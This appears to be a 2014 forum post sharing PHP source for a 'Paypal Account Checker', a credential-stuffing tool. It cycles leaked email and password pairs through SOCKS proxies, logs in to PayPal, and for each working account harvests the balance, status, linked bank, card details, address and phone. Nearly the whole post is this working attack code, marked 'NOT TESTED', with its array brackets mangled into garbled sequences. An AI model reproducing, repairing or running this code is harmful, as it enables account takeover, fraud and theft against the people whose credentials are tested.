]
07-09-2014, 10:42 PM
NOTE :- NOT TESTED
PHP Code:
<?
error_reporting(0);
?>
<?php xflush(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<!-- no cache headers -->
<!-- end no cache headers -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Paypal Account Checker</title>
<style>
body{
background:#ddd;
padding:5px;
margin:5px;
font-family:Tahoma;
font-size:13px;
color:#0F0317;
}
textarea,input,select
{
padding: 5px;
background:#ddf8cc;
color:darkgreen;
border:solid gray;
}
input
{
text-align:center;
}
</style>
</head>
<body><center><h1> Paypal Account Checker </h1></center><br>
<form method="post">
<div align="center"><textarea name="mp" cols="50" rows="10"><?php if($_POST***91;'btn-submit'***93;) echo $_POST***91;'mp'***93;; else echo '1596|[email protected]|lamdeogicopass';?></textarea><textarea name="socks" cols="30" rows="10"><?php if($_POST***91;'btn-submit'***93;) echo implode("\n",array_unique(get($_POST***91;'socks'***93;)));?>o la la sock</textarea><br />
Delim: <input type="text" name="delim" value="<?php if($_POST***91;'btn-submit'***93;) echo $_POST***91;'delim'***93;; else echo ':';?>" size="1" /> Email: <input type="text" name="mail" value="<?php if($_POST***91;'btn-submit'***93;) echo $_POST***91;'mail'***93;; else echo 1;?>" size="1" /> Password: <input type="text" name="pwd" value="<?php if($_POST***91;'btn-submit'***93;) echo $_POST***91;'pwd'***93;; else echo 2;?>" size="1" />
||.::
<input type="checkbox" name="bank" checked="checked" value="1" />Check Bank <input type="checkbox" name="card" checked="checked" value="1" />Check Card <input type="checkbox" name="info" checked="checked" value="1" />Get Address/Phone<br />
<input type="submit" value=" Submit " name="btn-submit" />
</div>
</form>
<?php
set_time_limit(0);
function curl($url='',$var=''){
global $config,$sock;
$curl = curl_init();
if ($sock) {
curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($curl, CURLOPT_PROXY, $sock);
curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_USERAGENT, $config***91;'useragent'***93;);
curl_setopt($curl, CURLOPT_REFERER, "https://www.paypal.com/");
if($var) {
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $var);
}
curl_setopt($curl, CURLOPT_COOKIEFILE,$config***91;'cookie_file'***93;);
curl_setopt($curl, CURLOPT_COOKIEJAR,$config***91;'cookie_file'***93;);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
function fetch_value($str,$find_start,$find_end)
{
$start = stripos($str, $find_start);
if($start===false) return "";
$length = strlen($find_start);
$end = stripos(substr($str, $start+$length), $find_end);
return trim(substr($str, $start+$length, $end));
}
$config***91;'useragent'***93; = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.18) Gecko/20110619 Firefox/3.6.18 (Palemoon/3.6.18)'; /// Iphone 2.21
################# RE-CONFIG ################
$dir = dirname(__FILE__);
$config***91;'cookie_file'***93; = $dir . '/cookies/'. md5($_SERVER***91;'REMOTE_ADDR'***93;) . '.txt';
if(!file_exists($config***91;'cookie_file'***93;)){
$fp = @fopen($config***91;'cookie_file'***93;,'w');
@fclose($fp);
}
#########################################
################# FUNCTION ################
$zzz = "";
$live = array();
function get($list)
{
preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}/", $list, $socks);
return $socks***91;0***93;;
}
function delete_cookies(){
global $config;
$fp = @fopen($config***91;'cookie_file'***93;,'w');
@fclose($fp);
}
function xflush()
{
static $output_handler = null;
if ($output_handler === null)
{
$output_handler = @ini_get('output_handler');
}
if ($output_handler == 'ob_gzhandler')
{
// forcing a flush with this is very bad
return;
}
flush();
if (function_exists('ob_flush') AND function_exists('ob_get_length') AND ob_get_length() !== false)
{
@ob_flush();
}
else if (function_exists('ob_end_flush') AND function_exists('ob_start') AND function_exists('ob_get_length') AND ob_get_length() !== FALSE)
{
@ob_end_flush();
@ob_start();
}
}
function isSockClear(){
global $sock;
$str = curl("https://www.paypal.com/xclick/business=paypal%40dreamhost.com&rm=2&item_name=Web +Hosting+Donation&item_number=donation_13185&amoun t=10&image_url=https%3A//secure.newdream.net/dreamhostpp.gif&no_shipping=1&no_note=1&return=htt p%3A//www.dreamhost.com/donate.cgi&cancel_return=&tax=0¤cy_code=USD" );
if(!$str)
return -1;
if(stripos($str,'password')!==false)
return 0;
return 1;
}
function display($str){
echo "<div>$str</div>";
}
function infoCard() {
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-credit-card-new-clickthru&flag_from_account_summary=1&nav=0.5.2");
//echo ' -> Fetching Card';xflush();
$checkcard = fetch_value($response,'s.prop1="','"');
if(stripos($checkcard,'ccadd')!==false)
return false;
preg_match_all('/<tr>(.+)<\/tr>/siU', $response, $matches);
$cc = array();
foreach($matches***91;1***93; AS $k => $v){
if($k>0){
preg_match_all('/<td>(.+)<\/td>/siU', $v, $m);
$type = fetch_value($m***91;1***93;***91;0***93;,'alt="','"');
$ccnum = $m***91;1***93;***91;1***93;;
$exp = $m***91;1***93;***91;2***93;;
$cc***91;***93; = "$type ***91;$ccnum $exp***93;";
}
}
$infocard = "<font color=\"#EDAD39\">" . implode("-", $cc) . "</font>";
return $infocard;
}
function infoBank(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-ach&nav=0.5.1");
//echo ' -> Fetching Bank';xflush();
if(stripos($response,'ach_id')!==false)
return true;
return false;
}
function info(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-address&nav=0.6.3");
//echo ' -> Fetching Information';xflush();
$info = str_replace("<br>",", ",fetch_value($response,'emphasis">','</span>'));
return substr($info,0,-2);
}
function infoPhone(){
global $config,$sock;
$response = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-phone&nav=0.6.4");
//echo ' -> Fetching Phone';xflush();
$info = strip_tags('<input type="hidden" '. fetch_value($response,'name="phone"','</label>'));
return $info;
}
if($_POST***91;'btn-submit'***93;){
xflush();
$socks = array_unique(get($_POST***91;'socks'***93;));
$emails = explode("\n",trim($_POST***91;'mp'***93;));
$sCount = count($socks);
$eCount = count($emails);
$failed = $live = $uncheck = array();
$checked = 0;
foreach($socks AS $sock){
if(!count($emails)) break;
delete_cookies();
$sockClear = isSockClear();
if($sockClear==-1){
display('***91;<font color="#FF0000">' . $sock . ' => Timeout/Die</font>***93;');
}
elseif($sockClear==0){
display('***91;<font color="#FF0000">' . $sock . ' => Blacklist</font>***93;');
}
xflush();
if($sockClear!=1) continue;
display('***91;<font color="#00FF00">' . $sock . ' => OK</font>***93;');
xflush();
$failed***91;$sock***93; = 0;
foreach($emails AS $k => $line){
$info = explode($_POST***91;'delim'***93;,$line);
$email = trim($info***91;"{$_POST***91;'mail'***93;}"***93;);
$pwd = trim($info***91;"{$_POST***91;'pwd'***93;}"***93;);
if(stripos($email,'@')===false || strlen($pwd)<8){
unset($emails***91;$k***93;);
display($email . ' | ' . $pwd . ' -> Wrong Mail/Pass Paypal Format');
xflush();
continue;
}
if($failed***91;$sock***93; > 5) break;
delete_cookies();
if(!curl("https://www.paypal.com/")){
display('***91;<font color="#FF0000">' . $sock . ' => Timeout/Die</font>***93;');
xflush();
break;
}
$var = "login_email=" . urlencode($email) . "&login_password=" . urlencode($pwd) . "&target_page=0&submit.x=Log+In&form_charset=U TF-8&bp_mid=v%3D1%3Ba1%3Dna%7Ea2%3Dna%7Ea3%3Dna%7Ea 4% 3DMozilla%7Ea5%3DNetscape%7Ea6%3D5.0+%28Windows%3B +en-US%29%7Ea7%3D20110619%7Ea8%3Dna%7Ea9%3Dtrue%7Ea10% 3DWindows+NT+6.1%7Ea11%3Dtrue%7Ea12%3DWin32%7Ea13% 3Dna%7Ea14%3DMozilla%2F5.0+%28Windows%3B+U%3B+Wind ows+NT+6.1%3B+en-US%3B+rv%3A1.9.2.18%29+Gecko%2F20110619+Firefox%2F 3.6.18+%28Palemoon%2F3.6.18%29%7Ea15%3Dtrue%7Ea16% 3Den-US%7Ea17%3Dna%7Ea18%3Dwww.paypal.com%7Ea19%3Dna%7E a20%3Dna%7Ea21%3Dna%7Ea22%3Dna%7Ea23%3D1280%7Ea24% 3D800%7Ea25%3D24%7Ea26%3D770%7Ea27%3Dna%7Ea28%3DTu e+Nov+22+2011+19%3A23%3A55+GMT%2B0700+%28SE+Asia+S tandard+Time%29%7Ea29%3D7%7Ea30%3Ddef%7Cqt1%7Cqt2% 7Cqt3%7Cqt4%7Cqt5%7Cqt6%7Cswf%7Crpl%7Crpv%7C%7Ea31 %3Dyes%7Ea32%3Dna%7Ea33%3Dna%7Ea34%3Dno%7Ea35%3Dno %7Ea36%3Dyes%7Ea37%3Dno%7Ea38%3Donline%7Ea39%3Dno% 7Ea40%3DWindows+NT+6.1%7Ea41%3Dno%7Ea42%3Dno%7E&bp _ks1=v%3D1%3Bl%3D8%3BDi0%3A68417Ui0%3A82Di1%3A71Di 2%3A70Ui1%3A15Ui2%3A70Di3%3A105Ui3%3A60Di4%3A70Ui4 %3A60Di5%3A103Ui5%3A67Di6%3A329Ui6%3A114Di7%3A66Ui 7%3A94&bp_ks2=&bp_ks3=&browser_name=Firefox&browse r_version=undefined&browser_version_full=3.6.18&op erating_system=Windows&flow_name=xpt%2FMarketing_C ommandDriven%2Fhomepage%2FMainHome&fso_enabled=11" ;
$s = curl("https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=5885d80a13c0db1f8e263663d3faee8db2 b24f7b84f1819343fd6c338b1d9d60", $var);
if(!$s){
display('***91;<font color="#FF0000">' . $sock . ' => Timeout/Die</font>***93;');
xflush();
break;
}
if(stripos($s,'security challenge')!==false){
display('***91;<font color="#FF0000">' . $sock . ' => Bad sock</font>***93;');
xflush();
break;
}
$checked++;
$error = fetch_value($s,'s.prop14="','"');
if($error = fetch_value($s,'s.prop14="','"')){
unset($emails***91;$k***93;);
display("<b style='color:red'>Die</b> => $sock | $email | $pwd");
$failed***91;$sock***93;++;
xflush();
continue;
}
$loggedIn = curl("https://www.paypal.com/us/cgi-bin/webscr?cmd=_account&nav=0.0");
if(!$loggedIn){
display('***91;<font color="#FF0000">' . $sock . ' => Timeout/Die</font>***93;');
unset($emails***91;$k***93;);
array_push($emails, $line);
xflush();
break;
}
if(stripos($loggedIn,'class="balance">')!==false){
$loggedIn = preg_replace('/<!--google(off|on): all-->/si','',$loggedIn);
$loggedIn = preg_replace('/\n+/si','',$loggedIn);
$pp = array();
$pp***91;'type'***93; = fetch_value($loggedIn,'s.prop7="','"');
$pp***91;'type'***93; = '<span class="' . $pp***91;'type'***93; . '">' . ucfirst($pp***91;'type'***93;) . '</span>';
$pp***91;'status'***93; = fetch_value($loggedIn,'s.prop8="','"');
$pp***91;'status'***93; = '<span class="' . $pp***91;'status'***93; . '">' . ucfirst($pp***91;'status'***93;) . '</span>';
if(fetch_value($loggedIn,'s.prop9="','"')!='unrest ricted')
$pp***91;'limited'***93; = '<font color="red">Limited</font>';
$pp***91;'bl'***93; = fetch_value($loggedIn,'<span class="balance">','</span>');
if($pp***91;'bl'***93;){
if(stripos($pp***91;'bl'***93;,'strong')!==false)
$pp***91;'bl'***93; = trim(fetch_value($pp***91;'bl'***93;,'<strong>','</strong>'));
}
else
$pp***91;'bl'***93; = fetch_value($loggedIn,'<span class="balance negative">','</span>');
if(!$pp***91;'limited'***93;){
if($_POST***91;'bank'***93;)
$pp***91;'bank'***93; = infoBank() ? "Have Bank" : "No Bank";
if($_POST***91;'card'***93;){
$card = infoCard();
$card = ($card) ? $card : "No Card";
$pp***91;'card'***93; = $card;
}
if($_POST***91;'info'***93;){
$pp***91;'address'***93; = info();
$pp***91;'phone'***93; = infoPhone();
}
}
$pp***91;'lastloggin'***93; = strip_tags(fetch_value($loggedIn,'<div class="small secondary">','</div>'));
$xyz = "<b style='color:yellow'>Live</b> => $sock | $email | $pwd | " . implode(" | ",$pp);
$live***91;***93; = $xyz;
unset($emails***91;$k***93;);
display($xyz);
xflush();
}
else{
$title = fetch_value($s,'title>','</title>');
display("<b style='color:red'>Bad Account</b> => $sock | $email | $pwd | $title");
unset($emails***91;$k***93;);
xflush();
}
xflush();
break;
}
}
display("<h3>Total: $eCount - Checked: $checked - Live: " . count($live) . "</h5>");
display(implode("<br />",$live));
if(count($emails)){
display("Uncheck:");
display(implode("<br />",$emails));
}
}
?>
</body>
